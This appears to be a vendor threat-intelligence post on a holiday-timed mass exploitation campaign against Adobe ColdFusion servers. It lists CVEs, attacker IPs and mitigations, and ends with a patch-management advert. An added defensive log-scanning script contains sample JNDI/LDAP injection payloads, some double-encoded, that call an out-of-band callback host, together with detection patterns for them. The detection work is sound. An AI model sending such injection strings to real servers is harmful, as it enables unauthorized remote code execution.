
Mass Exploitation Campaign Targeting Adobe ColdFusion Servers Detected During Christmas Holiday


A coordinated exploitation campaign targeted Adobe ColdFusion servers across the globe during the Christmas 2025 holiday period, generating 5,940 malicious requests that probed 10+ ColdFusion CVEs disclosed between 2023 and 2024. Telemetry indicates 68% of the activity occurred on December 25, suggesting deliberate timing to exploit reduced security monitoring during holidays. The vast majority of traffic (98%) originated from two IPs hosted by CTG Server Limited (Japan-based infrastructure), and the actor leveraged ProjectDiscovery Interactsh for out-of-band (OAST) callback verification, with JNDI/LDAP injection as the primary vector.

Background on the Threat Actor Behind the ColdFusion Christmas Campaign

A Single Coordinated Actor Using Japan-Based Infrastructure. Both SecurityAffairs and GreyNoise confirm that the mass exploitation of ColdFusion servers during Christmas 2025 was driven primarily by one threat actor, not multiple groups. This actor operated almost entirely from Japan-based infrastructure owned by CTG Server Limited, a hosting provider known for poor abuse management and previous associations with suspicious activity.

Campaign Overview

  • Timeframe: December 2025, peaking on Dec 25 (68% of traffic).
  • Scale: 5,940 ColdFusion-focused requests against targets in 20 countries; the United States (4,044 sessions), Spain (753) and India (128) were the most-hit.
  • Attribution: Single actor using Japan-based CTG Server Limited infrastructure, two IPs accounted for 98% of observed activity.
  • Technique Validation: Interactsh (ProjectDiscovery) used to confirm exploitation via OAST callbacks; JNDI/LDAP injection often paired with WDDX deserialization to reach RCE conditions.
  • Automation Indicators: 1–5-second request intervals; concurrent operation of the two IPs; cycling through multiple attack types per target.

Primary Targets

  • ColdFusion servers operated by enterprises across North America, Europe, and Asia.
  • Public-facing ColdFusion deployments with outdated patches or exposed administrative paths.

Key Characteristics

  • Mass CVE exploitation: 10+ distinct ColdFusion vulnerabilities from 2023–2024 targeted in rapid succession.
  • Out-of-band verification: Extensive use of Interactsh to confirm callbacks from compromised hosts.
  • Deliberate holiday timing: Activity concentrated on Christmas Day, indicative of operational discipline and awareness of defender gaps.

Vulnerability Details

CVE              Vulnerability              Affected versions                              CVSS   EPSS (at time of writing)
CVE-2023-26359   Arbitrary code execution   2018 Update 15, 2021 Update 5 and earlier      9.8    86.79%
CVE-2023-38205   Access control bypass      2018u18, 2021u8, 2023u2 and earlier            7.5    94.31%
CVE-2023-44353   Remote code execution      2023.5, 2021.11 and earlier                    9.8    90.26%
CVE-2023-38203   Remote code execution      2018u17, 2021u7, 2023u1 and earlier            9.8    94.26%
CVE-2023-38204   Remote code execution      2018u18, 2021u8, 2023u2 and earlier            9.8    78.00%
CVE-2023-29298   Access control bypass      2018u16, 2021u6, 2023.0.0.330468 and earlier   7.8    94.29%
CVE-2023-29300   Remote code execution      2018u16, 2021u6, 2023.0.0.330468 and earlier   9.8    93.80%
CVE-2023-26347   Access control bypass      2023.5, 2021.11 and earlier                    7.5    85.70%
CVE-2024-20767   Arbitrary file read        2023.6, 2021.12 and earlier                    7.4    94.15%
CVE-2023-44352   Reflected XSS              2023.5, 2021.11 and earlier                    6.1    82.74%

Version notation follows Adobe's update numbering: "2021u8" and "2021.8" both mean ColdFusion 2021 Update 8. EPSS scores are recomputed daily, so treat the column as a snapshot.

Tactics and Techniques (MITRE ATT&CK)

  • TA0001 – Initial Access: Exploit public-facing ColdFusion applications via JNDI/LDAP injection, deserialization RCE, and access control bypass.
  • TA0008 – Lateral Movement: Post-access expansion through ColdFusion administrator endpoints or dropped webshells.
  • TA0005 – Defense Evasion: OAST callbacks and minimal on-disk artifacts; template-driven scans to blend with background noise.

Indicators of Compromise (IOCs)

Primary Threat Actor Infrastructure (CTG Server Limited – AS152194):

  • 134.122.136[.]119
  • 134.122.136[.]96

Infection Method

Initial Access

Attackers scan for internet-exposed ColdFusion servers and send crafted HTTP requests that exercise deserialization (WDDX) or path/access bypass flaws on CFM/CFC endpoints, aiming for pre-auth code execution.

Exploitation

Primary vector is JNDI/LDAP injection chained through unsafe deserialization, commonly validated via Interactsh OAST callbacks to confirm vulnerable hosts in near real-time.

Payload Delivery

The actor relies on lightweight, callback-centric validation rather than bulky malware; webshells or in-memory execution may follow successful checks, reducing forensic artifacts.

Execution & Persistence

Post-exploitation involves admin endpoint access, webshell deployment, or further exploitation of N-day flaws to maintain access. The 1–5 second request cadence and the cycling through multiple vectors per target indicate scripted, automated operation rather than hands-on-keyboard activity.

Command-and-Control (C2)

C2 behavior primarily leverages OAST interactions and legitimate web interfaces, eschewing noisy beacons to evade traditional endpoint detection.

Impact

  • Pre-auth RCE & Access Bypass: Enables long-term unauthorized access, webshell deployment, and administrative manipulation of ColdFusion instances.
  • Service Risk: Chained exploits can degrade or disrupt critical web apps that rely on ColdFusion.
  • Broader Operation: ColdFusion exploitation represents 0.2% of a larger reconnaissance campaign that generated 2.5M+ requests across 767 CVEs and 47+ tech stacks, pointing to Initial Access Broker-style activity.

Visual Flow

Initial Access (pre-auth deserialization / access bypass) -> Exploitation (JNDI/LDAP + OAST callback verification) -> Post-Access (webshells / admin endpoints / file reads) -> Lateral Movement & Persistence (legitimate interfaces, low-noise ops)

Mitigation Steps

Patch & Harden Immediately: Update ColdFusion to the latest security update for its branch. ColdFusion 2018, which appears in the affected-versions list above, is out of Adobe support and must be migrated rather than patched.

Lock Down Admin & CFIDE Paths: Disable or restrict /CFIDE/administrator and related endpoints, enforce IP allow-listing and MFA, follow ColdFusion Lockdown Guide.

Detect OAST/JNDI Indicators: Monitor for Interactsh callback domains and JNDI/LDAP artifacts.

Threat Hunting & Response: Review web server and ColdFusion logs for suspicious access to CFIDE/CFC endpoints, unexpected outbound DNS or HTTP connections from the server (OAST callbacks), and webshell indicators such as new or modified .cfm/.cfc files; respond with credential rotation and host isolation if compromise is suspected.
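The following script is an added example (not code from the original post, from GreyNoise, or from SecPod) that turns the Exploitation description and the "Detect OAST/JNDI Indicators" and "Threat Hunting" steps above into a log check. It parses Apache combined-format access-log lines, URL-decodes request paths (repeatedly, so double-encoded payloads are caught), and flags JNDI lookup strings, Interactsh-style callback domains, hits on the /CFIDE administrator surfaces, and the two actor IPs from the IOC list. It also computes per-source inter-request intervals so the 1–5 second automation cadence can be checked. The log lines are constructed for the example, the callback hostname is made up, and the Interactsh domain list is an assumption taken from the public default servers; verify it against the ProjectDiscovery project and add any self-hosted servers.

```python
import re
from datetime import datetime
from typing import Optional
from urllib.parse import unquote

# Actor IPs from the IOC section above.
ACTOR_IPS = {"134.122.136.119", "134.122.136.96"}

# Default public Interactsh server domains (assumed list; check the
# ProjectDiscovery project for the current set, add self-hosted ones).
OAST_DOMAINS = ("oast.fun", "oast.live", "oast.me", "oast.pro",
                "oast.site", "oast.online", "interact.sh")

# JNDI lookup string, matched after URL-decoding so %24%7Bjndi... is caught.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop)\s*:", re.IGNORECASE)

# Administrative surfaces that should never be reachable from the internet.
ADMIN_RE = re.compile(r"/cfide/(administrator|adminapi)(/|$)", re.IGNORECASE)

# Apache "combined" format; IIS logs need a different regex but the same checks.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not real campaign telemetry). Line 2 carries a
# double-encoded JNDI payload, line 3 a single-encoded one.
SAMPLE_LOG = """\
134.122.136.119 - - [25/Dec/2025:03:14:07 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 512 "-" "Mozilla/5.0"
134.122.136.96 - - [25/Dec/2025:03:14:09 +0000] "GET /index.cfm?x=%2524%257Bjndi%253Aldap%253A%252F%252Fabc123.oast.fun%252Fa%257D HTTP/1.1" 200 310 "-" "Mozilla/5.0"
134.122.136.119 - - [25/Dec/2025:03:14:11 +0000] "GET /index.cfm?x=%24%7Bjndi%3Aldap%3A%2F%2Fabc123.oast.fun%2Fa%7D HTTP/1.1" 200 310 "-" "Mozilla/5.0"
134.122.136.119 - - [25/Dec/2025:03:14:14 +0000] "GET /CFIDE/adminapi/administrator.cfc HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Dec/2025:03:40:22 +0000] "GET /index.cfm?x=%24%7Bjndi%3Aldap%3A%2F%2Fabc123.oast.fun%2Fa%7D HTTP/1.1" 200 310 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Dec/2025:03:20:00 +0000] "GET /products.cfm?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Dec/2025:04:00:00 +0000] "POST /api/login.cfm HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""


def decode_path(path: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode_path(m["path"])
    reasons = []
    if m["ip"] in ACTOR_IPS:
        reasons.append("known-actor-ip")
    if JNDI_RE.search(path):
        reasons.append("jndi-lookup")
    if any(d in path.lower() for d in OAST_DOMAINS):
        reasons.append("oast-callback-domain")
    if ADMIN_RE.search(path):
        reasons.append("cfide-admin-path")
    if not reasons:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "path": path,
            "status": int(m["status"]), "reasons": reasons}


def scan_log(text: str) -> list:
    """Run analyze_line over every line and keep the hits, in log order."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


def request_intervals(text: str) -> dict:
    """Seconds between consecutive requests per source IP (automation check)."""
    seen: dict = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            seen.setdefault(m["ip"], []).append(ts)
    return {ip: [(b - a).total_seconds() for a, b in zip(t, t[1:])]
            for ip, t in seen.items() if len(t) > 1}


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], ",".join(hit["reasons"]), hit["path"])
    for ip, gaps in request_intervals(SAMPLE_LOG).items():
        print(ip, "inter-request seconds:", gaps)
```

A JNDI or callback-domain hit is worth investigating regardless of the source IP, since the two listed addresses are only the infrastructure seen in this campaign; a 200 response to a JNDI-bearing request does not by itself prove exploitation, so pair the web-log hit with outbound DNS or LDAP connections from the ColdFusion host to the same callback domain. Sources whose inter-request gaps sit consistently in the 1–5 second range across many distinct paths match the automation indicator described above.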

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.